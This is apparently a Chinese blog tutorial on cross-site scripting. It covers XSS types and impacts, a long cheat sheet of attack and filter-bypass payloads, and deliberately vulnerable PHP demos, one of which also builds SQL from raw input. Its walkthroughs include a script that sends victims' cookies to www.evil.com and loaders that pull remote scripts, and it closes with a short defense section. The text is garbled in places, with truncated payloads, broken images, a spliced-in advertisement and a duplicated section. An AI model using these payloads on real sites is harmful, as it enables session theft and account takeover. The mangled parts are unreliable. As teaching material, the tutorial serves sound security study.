网络安全之从原理看懂XSS
01、XSS的原理和分类
跨站脚本攻击XSS(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets,CSS)的缩写混淆
故将跨站脚本攻击缩写为XSS,恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页面时,嵌入Web里面的Script代码会被执行,从而达到恶意攻击用户的目的,XSS攻击针对的是用户层面的攻击;
XSS分为:存储型,反射型,DOM型XSS
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-VfraTiuk-1673946376410)(https://p3-sign.toutiaoimg.com/tos-cn-i-qvj2lq49k0/02d95974b84d4a789cd7d42d4e05180e~noop.image?_iz=58558&from=article.pc_detail&x-expires=1673963314&x-signature=q5H2CR%2FW%2FWBySB5jJkQbXSN5GTc%3D)]
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-PWtIux4E-1673946376412)(https://p3-sign.toutiaoimg.com/tos-cn-i-qvj2lq49k0/65287270c3fa48f894342c24f2597e3f~noop.image?_iz=58558&from=article.pc_detail&x-expires=1673963314&x-signature=F%2BpGkBky9ssbns71GANcCY%2Fa8PE%3D)]
存储型XSS:存储型XSS,持久化,代码是存储在服务器中,如在个人信息或发表文章等地方,插入代码,如果没有过滤或者过滤不严,那么这些代码将储存到数据库中,用户访问该页面的时候出发代码执行,这种XSS比较危险,容易造成蠕虫,盗取Cookie;
反射型XSS:非持久化,需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面,反射性XSS大多数是用来盗取用户的Cookie信息;
DOM型XSS:不经过后端,DOM-XSS漏洞是基于文档对象模型(Document Object Model ,DOM)的一种漏洞,DOM-XSS是用过url传入参数取控制触发的,其实也属于反射型XSS,DOM的详解:DOM文档对象模型;
学习计划安排
学习路线图大纲总览
我一共划分了六个阶段,但并不是说你得学完全部才能上手工作,对于一些初级岗位,学到第三四个阶段就足矣~这里我整合并且整理成了一份【282G】的网络安全从零基础入门到进阶资料包,需要的小伙伴可以扫描下方CSDN官方合作二维码免费领取哦,无偿分享!!!
【一一帮助网络安全学习,所有资源获取处一一】
①网络安全学习路线
②上百份渗透测试电子书
③安全攻防357页笔记
④50份安全攻防面试指南
⑤安全红队渗透工具包
⑥HW护网行动经验总结
⑦100个漏洞实战案例
⑧安全大厂内部视频资源
⑨历年CTF夺旗赛题解析接下来我将给各位同学划分一张学习计划表!
学习计划
那么问题又来了,作为萌新小白,我应该先学什么,再学什么?
既然你都问的这么直白了,我就告诉你,零基础应该从什么开始学起:阶段一:初级网络安全工程师
接下来我将给大家安排一个为期1个月的网络安全初级计划,当你学完后,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web渗透、安全服务、安全分析等岗位;其中,如果你等保模块学的好,还可以从事等保工程师。
综合薪资区间6k~15k
1、网络安全理论知识(2天)
①了解行业相关背景,前景,确定发展方向。
②学习网络安全相关法律法规。
③网络安全运营的概念。
④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(1周)
①渗透测试的流程、分类、标准
②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking
③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察
④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础(1周)
①Windows系统常见功能和命令
②Kali Linux系统常见功能和命令
③操作系统安全(系统入侵排查/系统加固基础)4、计算机网络基础(1周)
①计算机网络基础、协议和架构
②网络通信原理、OSI模型、数据转发流程
③常见协议解析(HTTP、TCP/IP、ARP等)
④网络攻击技术与网络安全防御技术
⑤Web漏洞原理与防御:主动/被动攻击、DDOS攻击、CVE漏洞复现5、数据库基础操作(2天)
①数据库基础
②SQL语言基础
③数据库安全加固6、Web渗透(1周)
①HTML、CSS和JavaScript简介
②OWASP Top10
③Web漏洞扫描工具
④Web渗透工具:Nmap、BurpSuite、SQLMap、其他(菜刀、漏扫等)
那么,到此为止,已经耗时1个月左右。你已经成功成为了一名“脚本小子”。那么你还想接着往下探索吗?阶段二:中级or高级网络安全工程师(看自己能力)
综合薪资区间15k~30k
7、脚本编程学习(4周)
在网络安全领域。是否具备编程能力是“脚本小子”和真正网络安全工程师的本质区别。在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中,想要高效地使用自制的脚本工具来实现各种目的,更是需要拥有编程能力。零基础入门的同学,我建议选择脚本语言Python/PHP/Go/Java中的一种,对常用库进行编程学习
搭建开发环境和选择IDE,PHP环境推荐Wamp和XAMPP,IDE强烈推荐Sublime;Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,没必要看完
用Python编写漏洞的exp,然后写一个简单的网络爬虫
PHP基本语法学习并书写一个简单的博客系统
熟悉MVC架构,并试着学习一个PHP框架或者Python框架 (可选)
了解Bootstrap的布局或者CSS。
阶段三:顶级网络安全工程师
这部分内容对于咱们零基础的同学来说还太过遥远了,由于篇幅问题就不展开细说了,我给大家贴一个学习路线。感兴趣的童鞋可以自行研究一下哦,当然你也可以点击这里加我与我一起互相探讨、交流、咨询哦。
学习资料分享
当然,只给予计划不给予学习资料的行为无异于耍流氓,这里给大家整理了一份【282G】的网络安全工程师从入门到精通的学习资料包,可点击下方二维码链接领取哦。
可能触发DOM型XSS的属性
document.referer
window.name
location
innerHTML
documen.write
02、XSS攻击的危害
1、盗取各类用户账号,如机器登陆账号,用户网银账号,各类管理员账号;
2、控制企业数据,包括读取,篡改,添加,删除企业敏感数据的能力;
3、盗取企业重要的具有商业价值的资料;
4、非法转账;
5、强制发送电子邮件;
6、网站挂马;
7、控制受害者机器向其他网站发起攻击;
03、XSS的测试语句
在网站是否存在XSS漏洞时,应该输入一些标签,如<,>输入后查看网页源代码是否过滤标签,如果没有过滤,很大可能存在XSS漏洞。
常用测试语句:
1
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-9VQYhtGO-1673946376413)(https://p3-sign.toutiaoimg.com/tos-cn-i-qvj2lq49k0/06cd92051e9e4ddeba447480d8338f6c~noop.image?_iz=58558&from=article.pc_detail&x-expires=1673963314&x-signature=OOM5qohiln6Htt5f%2FqEeRWouDWg%3D)]
1
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-bOZT5Nzn-1673946376413)(https://p3-sign.toutiaoimg.com/tos-cn-i-qvj2lq49k0/e7872b7e2a4b42ab8a1318d4880bac18~noop.image?_iz=58558&from=article.pc_detail&x-expires=1673963314&x-signature=Vv5J0S5mkRNi4fp%2FVhFXC1IaOIQ%3D)]
可以看到,网站并没有对标签进行过滤;
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-9rAUMCEG-1673946376414)(https://p3-sign.toutiaoimg.com/tos-cn-i-qvj2lq49k0/37bc80ae86554333bacc036e743a76d9~noop.image?_iz=58558&from=article.pc_detail&x-expires=1673963314&x-signature=CEmcC12GF6507pe4mCl5B2Sflzc%3D)]
可以看到,并没有弹出,但是控制台上输出了1,我们可以确定,确实存在XSS;
闭合问题:很多时候,在测试XSS的时候,想要要考虑到闭合问题,我们首先查看网页的源代码,需要首先判断出来,网站用的时单引号闭合还是双引号闭合;
“>x<”
‘>x<’
单行注释:
">x//#双斜杠表示注释掉后面的语句
0x04、XSS攻击语句
输入检测确定标签没有过滤,为了显示漏洞存在,需要插入XSS攻击代码;
<script>alert(1)</script>
<svg onload=alert(1)>
<a href=javascript:alert(1)>
<a href='javascript:alert(1)'>aa</a>
(1)普通的 XSS JavaScript 注入
(2)IMG 标签 XSS 使用 JavaScript 命令
<IMG SRC=https://img-home.csdnimg.cn/images/20230724024159.png?origin_url=http%3A%2F%2F3w.org%2FXSS%2Fxss.js%2F&pos_id=img-tAhR0g6F-1704680678759)>
(3)IMG 标签无分号无引号
<IMG SRC=javascript:alert(‘XSS’)>
(4)IMG 标签大小写不敏感
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
(5)HTML 编码(必须有分号)
<IMG SRC=javascript:alert(“XSS”)>
(6)修正缺陷 IMG 标签
<IMG “”“>”>
(7)formCharCode 标签(计算器)
(8)UTF-8 的 Unicode 编码(计算器)
<IMG SRC=jav…省略…S’)>
(9)7 位的 UTF-8 的 Unicode 编码是没有分号的(计算器)
<IMG SRC=jav…省略…S’)>
(10)十六进制编码也是没有分号(计算器)
<IMG SRC=java…省略…XSS’)>
(11)嵌入式标签,将 Javascript 分开
(12)嵌入式编码标签,将 Javascript 分开
(13)嵌入式换行符
(14)嵌入式回车
(15)嵌入式多行注入 JavaScript,这是 XSS 极端的例子
(16)解决限制字符(要求同页面)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+'src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>
(17)空字符 12-7-1 T00LS - Powered by Discuz! Board
https://www.a.com/viewthread.php?action=printable&tid=15267 2/6perl-e ‘print “<IMG SRC=java\0script:alert(“XSS”)>”;’ > out
(18)空字符 2,空字符在国内基本没效果.因为没有地方可以利用
perl -e ‘print “<SCR\0IPT>alert(“XSS”)</SCR\0IPT>”;’ > out
(19)Spaces 和 meta 前的 IMG 标签
(20)Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=“http://3w.org/XSS/xss.js”>
(21)Non-alpha-non-digit XSS to 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22)Non-alpha-non-digit XSS to 3<SCRIPT/SRC=“http://3w.org/XSS/xss.js”>(23)双开括号<(31)Input Image(32)BODY Image(33)BODY 标签<BODY(‘XSS’)>(34)IMG Dynsrc(35)IMG Lowsrc(36)BGSOUND(37)STYLE sheet(38)远程样式表(39)List-style-image(列表式)
- XSS(41)META 链接 url(42)Iframe(43)Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');">
</FRAMESET>12-7-1 T00LS - Powered by Discuz!
Boardhttps://www.a.com/viewthread.php?action=printable&tid=15267 3/6
(44)Table
**(45)TD**| **(46)DIV background-image**
**(47)DIV background-image 后加上额外字符** (1-32&34&39&160&8192-8&13&12288&65279) **
** **(48)DIV expression**
**(49)STYLE 属性分拆表达**
**(50)匿名 STYLE(组成:开角号和一个字母开头)** **(51)STYLE background-image**
|
<STYLE><STYLEtype="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54)BASE
<BASE HREF="javascript:alert('XSS');//">
(55)EMBED 标签,你可以嵌入 FLASH,其中包涵 XSS(56)在 flash 中使用 ActionScrpt 可以混进你 XSS 的代码a=“get”;b=“URL(”“;c=“javascript:”;d=“alert(‘XSS’);”)”;eval_r(a+b+c+d);(57)XML namespace.HTC 文件必须和你的 XSS 载体在一台服务器上<?import namespace=“xss"implementation=“http://3w.org/XSS/xss.htc”>xss:xssXSS</xss:xss>(58)如果过滤了你的 JS 你可以在图片里添加 JS 代码来利用(66)
12-7-1 T00LS - Powered by Discuz! Board
https://www.a.com/viewthread.php?action=printable&tid=15267 4/6<SCRIPT a=">'>"
SRC="http://3w.org/xss.js"></SCRIPT>
(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68)URL 绕行XSS(69)URL 编码XSS(70)IP 十进制<A HREF="http://3232235521″>XSS(71)IP 十六进制<A HREF="http://0xc0.0xa8.0×00.0×01″>XSS(72)IP 八进制<A HREF=“http://0300.0250.0000.0001″>XSS(73)混合编码<A HREF=“http://6 6.000146.0×7.147/””>XSS(74)节省[http:]XSS(75)节省[www]XSS(76)绝对点绝对 DNSXSS(77)javascript 链接XSS
各个标签的的攻击语句;
<script>alert("hack")</script> #弹出hack
<script>alert(/hack/)</script> #弹出hack
<script>alert(1)</script> #弹出1,对于数字可以不用引号
<script>alert(document.cookie)</script> #弹出cookie
<script src=http://xxx.com/xss.js></script> #引用外部的xss
svg标签:
<svg onload="alert(1)">
<svg onload="alert(1)"//
标签:
<img src=1 οnerrοr=alert("hack")>
<img src=1 οnerrοr=alert(document.cookie)> #弹出cookie
标签:
<body οnlοad=alert(1)>
<body οnpageshοw=alert(1)>
video 标签:
<video οnlοadstart=alert(1) src="/media/hack-the-planet.mp4" />
style标签:
<style οnlοad=alert(1)></style>
05、XSS漏洞的挖掘
5.1、黑盒测试
尽可能找到一切用户可控并且能够输出在页面代码中的地方,比如下面这些:
- URL的每一个参数
- URL本身
- 表单
- 搜索框
5.2、常见业务场景
- 重灾区:评论区,留言区,个人信息,订单信息等
- 针对型:站内信,网页及时通讯,私信,意见反馈
- 存在风险:搜索框,当前目录,图片属性等;
5.3、白盒审计
关于XSS的代码审计主要就是从接收参数的地方和一些关键此入手;
PHP中常见的接收参数的方法有_GET,G**ET,_POST,$_REQUEST等等,可以搜索所有接收参数的方法,然后对接收到的数据进行跟踪,看看有没有输出到页面中,然后看看输出到页面中的数据是否进行了过滤和html编码等处理
也可以搜索类似echo这样的输出语句,跟踪输出的变量是从哪里来的,我们是否能控制,如果从数据库中取得,是否能控制存到数据库得数据,存到数据库之前有没有得到过滤等等;
大多数程序会对接收参数封装在公共文件得函数中统一调用,我们就需要审计这些公共函数看有没有过滤,能否绕过等等;
同理审计DOM型注入可以搜索一些js操作DOM元素得关键字进行审计;
06、XSS的攻击过程
6.1、反射型XSS漏洞:
1、Alice经常浏览某个网站,此网站为Bob所拥有,Bob的站点需要Alice使用用户名、密码进行登陆,并存储了Ailce敏感信息(比如银行账户);
2、Tom发现Bob的站点存在反射的XSS漏洞;
3、Tom利用Bob网站的反射型XSS漏洞编写了一个exp,做成链接的形式,并利用各种手段诱导Alice点击
4、Alice在登陆Bob的站点后,浏览了Tom提供的恶意链接;
5、嵌入到恶意链接中的恶意脚本在Alice的浏览器中执行,此脚本盗取敏感信息(cookie,账号等信息),然后在Alice完全不知情的情况下将这些信息发送给了Tom;
6、Tom利用获取到的Cookie就可以以Alice的身份信息登陆Bob的站点,如果脚本的功能更强大的化,Tom还可以对Alice的浏览器做控制并进一步利用漏洞控制;
6.2、存储型XSS漏洞:
1、Bob拥有一个Web站点,该站点允许用户发布信息,浏览已发布的信息;
2、Tom检测到Bob的站点存在存储型的XSS漏洞;
3、Tom在Bob的网站发布了一个带有恶意脚本的热点信息,该热点信息存储在了Bob的服务器的数据库中,然后吸引其他用户来阅读该热点信息;
4、Bob或者时任何的其他人,如Alice浏览了该信息之后,Tom的恶意脚本就会执行;
5、Tom的恶意脚本执行后,Tom就可以对浏览器该页面的用户发起一次XSS攻击;
07、XSS攻击测试
7.1、远程加载攻击payload
XSS漏洞能够通过构造恶意的XSS语句实现很多功能,其中做常用的时,构建XSS恶意代码获取对方浏览器的COOKIE;
1)我们首先把恶意代码保存在本地kali里面,实战情况下,我们将代码保存在我们的服务器上;
var img=document.createElement("img");
img.src="http://www.evil.com/log?"+escape(document.cookie);
document.body.appendChild(img);
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-4ORXUiGe-1673946376414)(https://p3-sign.toutiaoimg.com/tos-cn-i-qvj2lq49k0/be01f94160bc49bdba512b765488d087~noop.image?_iz=58558&from=article.pc_detail&x-expires=1673963314&x-signature=Vnm4U%2BVeAPjt7klZhdZQQ3SeUqc%3D)]
2)我们在kali,用python开启http服务;
python -m http.server 80
3)我们在有XSS漏洞的地方,远程加载我们的恶意代码:
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-myzcZ5zn-1673946376416)(https://p3-sign.toutiaoimg.com/tos-cn-i-qvj2lq49k0/cbfe7128979049d887378f7b8e0bdee7~noop.image?_iz=58558&from=article.pc_detail&x-expires=1673963314&x-signature=HDLyM2lQTDFwd5JPONzgv%2F4ympc%3D)]
看到浏览器加载了,我们的xss恶意代码;
4)成功获取到了cookie信息
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Wh9EaVN5-1673946376416)(https://p3-sign.toutiaoimg.com/tos-cn-i-qvj2lq49k0/f3427051a18c41758167a60b2294e2e6~noop.image?_iz=58558&from=article.pc_detail&x-expires=1673963314&x-signature=kybu81UC2ESKVQt3NiZikWMb4dM%3D)]
5)图片创建链接
<img src=''
onerror=document.body.appendChild(document.createElement('script')).src='//192.168.0.110/xss.
js'>
6)字符拼接
这种一般是输入的字符有限制的时候使用
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://www.'</script>
<script>z=z+'xsstools'</script>
<script>z=z+'.com/a'</script>
<script>z=z+'mER></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
有的情况要用/**/注释不需要的代码。
7)jQuery加载
<script>$.getScript("//www.xsstools.com/amER");</script>
7.2、反射型XSS:
//前端 1.html:
<html>
<head lang="en">
<meta charset="UTF-8">
<title>反射型XSS</title>
</head>
<body>
<form action="action.php" method="post">
<input type="text" name="name" />
<input type="submit" value="提交">
</form>
</body>
</html>
//后端 action.php:
<?php
$name=$_POST["name"];
echo $name;
?>
我们接着在输入框输入:
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Xu7EEhdf-1673946376416)(https://p3-sign.toutiaoimg.com/tos-cn-i-qvj2lq49k0/106554c157be451c89b8ee9b3a6bb95d~noop.image?_iz=58558&from=article.pc_detail&x-expires=1673963314&x-signature=xrM2Dw89SVWn491CMwXfTKt%2BPVw%3D)]
页面直接弹出了xss的页面,可以看到, 我们插入的语句已经被页面给执行了,这就是最基本的反射型XSS漏洞,这种漏洞流向:前端–>后端–>前端
7.3、存储型XSS:
//前端:2.html
<html>
<head lang="en">
<meta charset="UTF-8">
<title>存储型XSS</title>
</head>
<body>
<form action="action2.php" method="post">
输入你的ID:<input type="text" name="id" /> <br/>
输入你的Name:<input type="text" name="name" /> <br/>
<input type="submit" value="提交">
</form>
</body>
</html>
//后端:action2.php
<?php
$id=$_POST["id"];
$name=$_POST["name"];
mysql_connect("localhost","root","root");
mysql_select_db("test");
$sql="insert into xss value ($id,'$name')";
$result=mysql_query($sql);
?>
//供其他用户访问页面:show2.php
<?php
mysql_connect("localhost","root","root");
mysql_select_db("test");
$sql="select * from xss where id=1";
$result=mysql_query($sql);
while($row=mysql_fetch_array($result)){
echo $row['name'];
}
?>
这里有一个用户提交页面,数据提交给后端之后,后端存储在数据库中,然后当其他用户访问另一个页面的时候,后端调出该数据,显示给另一个用户,XSS代码就被执行了;
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Iuwkkpy9-1673946376416)(https://p3-sign.toutiaoimg.com/tos-cn-i-qvj2lq49k0/8af9eb38a37246da915d6fa80998e0e5~noop.image?_iz=58558&from=article.pc_detail&x-expires=1673963314&x-signature=BwBAiZ3Exsi2Qm4WByYcOWZ%2BoFk%3D)]
我们输入3和,接着,我们看看数据库;
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xKAlXyfG-1673946376417)(https://p3-sign.toutiaoimg.com/tos-cn-i-qvj2lq49k0/27ec52db5367414ebe47671706c84f3b~noop.image?_iz=58558&from=article.pc_detail&x-expires=1673963314&x-signature=wrBjL%2BP6gIpz1iAwwcMpTJMiKAA%3D)]
可以看到,我们的XSS语句已经插入到数据库中了;
然后当其他用户访问,show2.php页面的时候,我们插入的XSS代码就执行了;
存储型XSS的数据流向是:前端–>后端–>数据库–>后端–>前端
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-yyhqNWj4-1673946376418)(https://p3-sign.toutiaoimg.com/tos-cn-i-qvj2lq49k0/1786efd7fed349faa7026673cfa7c783~noop.image?_iz=58558&from=article.pc_detail&x-expires=1673963314&x-signature=x7VuOef2y8zJ0bhFjSO31KV93tU%3D)]
7.4、DOM型XSS
先放源代码:
// 前端3.html
<html>
<head lang="en">
<meta charset="UTF-8">
<title>DOM型XSS</title>
</head>
<body>
<form action="action3.php" method="post">
<input type="text" name="name" />
<input type="submit" value="提交">
</form>
</body>
</html>
// 后端action3.php
<?php
$name=$_POST["name"];
?>
<input id="text" type="text" value="<?php echo $name; ?>"/>
<div id="print"></div>
<script type="text/javascript">
var text=document.getElementById("text");
var print=document.getElementById("print");
print.innerHTML=text.value; // 获取 text的值,并且输出在print内。这里是导致xss的主要原因。
</script>
这里有一个提交页面,用户可以在此提交数据,数据提交之后,给后台处理;
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-HJIWzmi7-1673946376418)(https://p3-sign.toutiaoimg.com/tos-cn-i-qvj2lq49k0/d1cf1e312b2a4c61ada583d9690eb2aa~noop.image?_iz=58558&from=article.pc_detail&x-expires=1673963314&x-signature=D2gzS%2Fl%2B9jyHh9ojftkcjGpfrDs%3D)]
我们可以输入,然后看看页面的变化;
页面直接弹出了hack的页面,我们插入的语句已经被页面给执行了;
这就是DOM型XSS的漏洞,这种漏洞的数据流向是:前端–>浏览器
08、XSS编码绕过
8.1、gpc过滤字符
如果gpc开启的时候,特殊字符会被加上斜杠即,‘变成’,xss攻击代码不要用带单引号和双引号;
绕过gpc在php高版本gpc默认是没有的,但是开发程序员会使用addcslashes()对特殊字符进行转义;
这个是执行不了的 没有单引号可执行8.2、过滤alert
当页面过滤alert这个函数时,因为这个函数会弹窗,不仅很多程序会对他进行过滤,而且很多waf都会对其进行拦截,所以不存在alert即可;
<script>prompt(/xss/);</script>
<script>confirm(1);</script>
<script src=http://www.xss123.com/eciAKJ?1623635663></script>
8.3、过滤标签
在程序里如果使用了html实体过滤,在php会使用htmlspecialchars()对输入的字符进行实体化,实体化之后的字符不会在html执行,把预定义的字符"<“(小于)和”>"(大于)转化为HTML实体,构造xss恶意代码大多数都必须使用<或者>,这两个字符被实体化之后,html里就不能执行了;
预定义的字符是:
&(和号)成为&
“(双引号)成为"
’(单引号)成为’
<(小于)成为<
·>(大于)成为>
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-cs61isGM-1673946376419)(https://p3-sign.toutiaoimg.com/tos-cn-i-qvj2lq49k0/5b7a09a28eab4203ae7aefab06ba8e87~noop.image?_iz=58558&from=article.pc_detail&x-expires=1673963314&x-signature=kb%2FI9tmYMFZZlixKqDr5AvVHKoc%3D)]
但是又在input这些标签里是不用考虑标签实体化,因为用不上<>这两个标签,
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-6eu4zH2p-1673946376419)(https://p3-sign.toutiaoimg.com/tos-cn-i-qvj2lq49k0/b5f55d36431d424fbee9425399063881~noop.image?_iz=58558&from=article.pc_detail&x-expires=1673963314&x-signature=nAv7fBNFwicdQ9MfTg%2FENfkXHKw%3D)]
8.4、ascii编码
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-YpXLeqjy-1673946376420)(https://p3-sign.toutiaoimg.com/tos-cn-i-qvj2lq49k0/a6a16c3dc07f4af59f68a9d69c144e57~noop.image?_iz=58558&from=article.pc_detail&x-expires=1673963314&x-signature=GJCsA7M5YGICSmf%2BFn4%2Fr4Lm9vY%3D)]
8.5、url编码
123
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-FnpNLT75-1673946376420)(https://p3-sign.toutiaoimg.com/tos-cn-i-qvj2lq49k0/7a9a8b74417b46aea3739bdcef2f8a9f~noop.image?_iz=58558&from=article.pc_detail&x-expires=1673963314&x-signature=f19eMtv5a7jV33F5YRQ9Kysx3yQ%3D)]
8.6、JS编码
编码直通车:
https://www.jb51.net/tools/zhuanhuan.htm
八进制编码:
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-vRo0oMNI-1673946376420)(https://p3-sign.toutiaoimg.com/tos-cn-i-qvj2lq49k0/77f2fa9825664ac1a4a546c082d09170~noop.image?_iz=58558&from=article.pc_detail&x-expires=1673963314&x-signature=21mRL3dCx%2FXGfr4cOA5ZLnwnPOs%3D)]
16进制编码
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-uPSrss9c-1673946376421)(https://p3-sign.toutiaoimg.com/tos-cn-i-qvj2lq49k0/608fc6f323a94a899cd21ab3ba58679c~noop.image?_iz=58558&from=article.pc_detail&x-expires=1673963314&x-signature=2CjZfQmDNSNT3rfPJWdtGWp9vrY%3D)]
jsunicode编码
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-fyFXjGmd-1673946376421)(https://p3-sign.toutiaoimg.com/tos-cn-i-qvj2lq49k0/54b9bebdea084599bc6404692013a2f1~noop.image?_iz=58558&from=article.pc_detail&x-expires=1673963314&x-signature=tp6dfMiTtQfcbo7T9D1VsT1Wb3E%3D)]
8.7、HTML编码
在=后可以解析html编码
十进制:
Button
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ZpkZd0kd-1673946376421)(https://p3-sign.toutiaoimg.com/tos-cn-i-qvj2lq49k0/55352c02fc0e4ec28a64b974ec2b05bc~noop.image?_iz=58558&from=article.pc_detail&x-expires=1673963314&x-signature=v59v9QvQdQc2vxPWxx7bE7ey0i8%3D)]
十六进制
'<img src="x" onerror="alert(1)"/>'
8.8、base64编码
使用伪协议base64解码执行xss
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">111</a>
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe>
0x09、XSS的防御
XSS防御的总体思路是:对用户的输入(和URL参数)进行过滤,对输出进行html编码,也就是对用户提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容,然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行;
对输入的内容进行过滤,可以分为黑名单和白名单过滤,黑名单过滤虽然可以拦截大部分的XSS攻击,但是还是存在被绕过的风险,白名单过滤虽然可以基本杜绝XSS攻击,但是真实环境中一般是不能进行如此严格的白名单过滤的;
对输出进行html编码,就是通过函数,将用户的输入的数据进行html编码,使其不能作为脚本运行;
如下是使用php中的htmlspecialchars函数对用户输入的name参数进行html编码,将其转化为html实体;
#使用htmlspecialchars函数对用户输入的name参数进行html编码,将其转换为html实体
$name = htmlspecialchars( $_GET[ 'name' ] );
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">111</a>
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe>
0x09、XSS的防御
XSS防御的总体思路是:对用户的输入(和URL参数)进行过滤,对输出进行html编码,也就是对用户提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容,然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行;
对输入的内容进行过滤,可以分为黑名单和白名单过滤,黑名单过滤虽然可以拦截大部分的XSS攻击,但是还是存在被绕过的风险,白名单过滤虽然可以基本杜绝XSS攻击,但是真实环境中一般是不能进行如此严格的白名单过滤的;
对输出进行html编码,就是通过函数,将用户的输入的数据进行html编码,使其不能作为脚本运行;
如下是使用php中的htmlspecialchars函数对用户输入的name参数进行html编码,将其转化为html实体;
#使用htmlspecialchars函数对用户输入的name参数进行html编码,将其转换为html实体
$name = htmlspecialchars( $_GET[ 'name' ] );
我们还可以服务端设置会话Cookie的HTTP Only属性,这样客户端的JS脚本就不能获取Cookie信息了;
608
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
